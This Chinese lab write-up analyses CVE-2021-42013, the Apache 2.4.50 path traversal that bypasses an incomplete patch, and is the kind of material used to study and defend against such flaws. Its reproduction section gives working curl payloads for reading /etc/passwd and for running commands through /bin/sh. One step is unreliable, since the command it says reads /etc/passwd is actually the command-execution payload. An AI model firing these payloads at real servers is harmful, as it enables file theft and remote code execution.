当先锋百科网

首页 1 2 3 4 5 6 7

Apache HTTP Server 2.4.50 路径穿越漏洞(CVE-2021-42013)

0x01 漏洞简介

Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。Apache官方在2.4.50版本中对2.4.49版本中出现的目录穿越漏洞CVE-2021-41773进行了修复,但这个修复是不完整的,CVE-2021-42013是对补丁的绕过。

攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。

0x02 影响版本

这个漏洞可以影响Apache HTTP Server 2.4.49以及2.4.50两个版本。

0x03 环境搭建

执行如下命令编译及运行一个存在漏洞的Apache HTTP Server 2.4.50版本服务器:

docker-compose build
docker-compose up -d

环境启动后,访问http://your-ip:8080即可看到Apache默认的It works!页面。

0x04 漏洞分析

2.4.50版本对ap_normalize_path函数进行修改,补充了如下代码,对.%2e的绕过形式进行了判断,可以避免使用该方法绕过。

在这里插入图片描述

在处理外部HTTP请求时,会调用 ap_process_request_internal函数对url路径进行处理,在该函数中,首先会调用ap_normalize_path函数进行一次url解码,之后会调用ap_unescape_url函数进行二次解码,代码如下:

在这里插入图片描述在这里插入图片描述

  • 在处理前path参数为/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd
  • 经过ap_normalize_path函数处理后path参数变成/icons/.%2e/.%2e/.%2e/.%2e/etc/passwd
  • ap_unescape_url函数实际会调用unescape_url函数,经过unescape_url函数处理后,可以看到此时的url字符串内容变成/icons/../../../../etc/passwd

0x05 漏洞复现

我们使用CVE-2021-41773中的Payload已经无法成功利用漏洞了,说明2.4.50进行了修复。

但我们可以使用.%%32%65进行绕过(注意其中的/icons/必须是一个存在且可访问的目录):

curl -v --data "echo;id" http://192.168.237.129:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

可见,成功读取到/etc/passwd

在这里插入图片描述

在服务端开启了cgi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意命令:

curl -v --data "echo;id" 'http://your-ip:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

在这里插入图片描述

参考链接

https://www.jianshu.com/p/3076d9ec68cf